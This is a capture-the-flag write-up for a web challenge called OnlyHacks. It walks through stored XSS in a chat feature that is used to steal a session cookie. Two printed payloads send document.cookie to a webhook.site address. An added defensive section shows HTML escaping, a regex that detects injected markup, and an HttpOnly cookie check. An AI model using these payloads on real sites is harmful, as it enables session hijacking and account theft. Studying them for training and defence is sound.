Tag: Writeup

  • Titanic

    Coming Soon!

  • OnlyHacks

    Summary

    This Valentine’s-themed web challenge focuses on exploiting Cross-Site Scripting (XSS) to steal a cookie, hijack an account, and retrieve the flag.

    Write-up


    The login page appears resistant to basic SQL injection and authentication bypass attempts.

    We will move on with the Sign Up function.


    The signup process, however, requires a profile picture upload, which presents a potential vulnerability.

    Moving on to the Dashboard.


    Upon reaching the dashboard, swiping through profiles reveals usernames, not nicknames, as indicated in dashboard.js. This suggests two possible attack vectors: XSS within the chat functionality or exploiting a web Large Language Model (LLM) integrated into the chatbot.


    I initially pursued the web LLM angle, influenced by my experience with tools like ChatGPT and Gemini. However, this proved to be a misdirection. The challenge actually involves a simpler XSS vulnerability.

    Let's try a basic XSS probe:

    <script>alert(1)</script>


    We’ve confirmed the XSS vulnerability. Now, let’s craft a payload to steal cookies.

    <script>fetch('https://webhook.site/b7e66...',{method: 'POST', mode: 'no-cors', body:document.cookie}); </script>

    Or

    <script>document.location="https://webhook.site/b7e66.../?cookie="+document.cookie</script>


    Replace our own session cookie with the one we captured, then refresh the page to get the flag.

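    The root cause behind the steps above is chat text being inserted into the page as raw HTML, combined with a session cookie that script is allowed to read. The following is an added example, not code from the challenge or the original writeup, that reproduces the unsafe rendering pattern, shows the escaped version beside it, flags stored messages that would inject markup, and checks a Set-Cookie header for the HttpOnly attribute that would have made the cookie theft fail. Function names such as renderChatMessageUnsafe and the sample cookie values are assumptions of this example.

```javascript
// Added example (not from the original writeup): how the chat XSS arises and
// two defender-side fixes. Function names here are hypothetical.

// Minimal HTML-body escaping: enough to stop markup injection when a string is
// placed between tags. Attribute, URL and JavaScript contexts need their own
// context-specific encoding on top of this.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Simulates the vulnerable pattern: user text concatenated straight into HTML
// (the equivalent of element.innerHTML = '<p>' + msg + '</p>').
function renderChatMessageUnsafe(from, text) {
  return `<div class="msg"><b>${from}</b>: ${text}</div>`;
}

// Hardened version: every user-controlled value is escaped before it becomes
// markup. In a real browser, prefer textContent / createTextNode instead of
// building HTML strings at all.
function renderChatMessageSafe(from, text) {
  return `<div class="msg"><b>${escapeHtml(from)}</b>: ${escapeHtml(text)}</div>`;
}

// Crude review helper for stored messages: flags strings that would introduce
// a tag or an inline event-handler attribute if rendered unescaped.
function looksLikeMarkupInjection(text) {
  return /<\s*\/?\s*[a-z][^>]*>/i.test(text) || /\bon[a-z]+\s*=/i.test(text);
}

// Parses a Set-Cookie header and reports whether the cookie would be readable
// via document.cookie. Without HttpOnly, reading document.cookie from injected
// script works; with it, the browser hides the value from script even when an
// XSS bug is present.
function cookieReadableByScript(setCookieHeader) {
  const attrs = setCookieHeader
    .split(';')
    .slice(1)
    .map((a) => a.trim().toLowerCase());
  return !attrs.includes('httponly');
}

// Constructed sample data (not captured from the challenge).
const probe = '<script>alert(1)</script>';
const unsafeHtml = renderChatMessageUnsafe('mallory', probe);
const safeHtml = renderChatMessageSafe('mallory', probe);

console.log('unsafe render:', unsafeHtml);
console.log('safe render:  ', safeHtml);
console.log('flagged for review:', looksLikeMarkupInjection(probe));
console.log('session readable by script (no HttpOnly):',
  cookieReadableByScript('session=abc123; Path=/; Secure'));
console.log('session readable by script (HttpOnly):',
  cookieReadableByScript('session=abc123; Path=/; HttpOnly; Secure'));
```

    Run it with `node` to see the two renderings side by side. The escaping fix stops the markup from ever reaching the DOM; the HttpOnly check is the second, independent layer: even if a future template slips unescaped input through, a cookie that script cannot read cannot be exfiltrated with document.cookie.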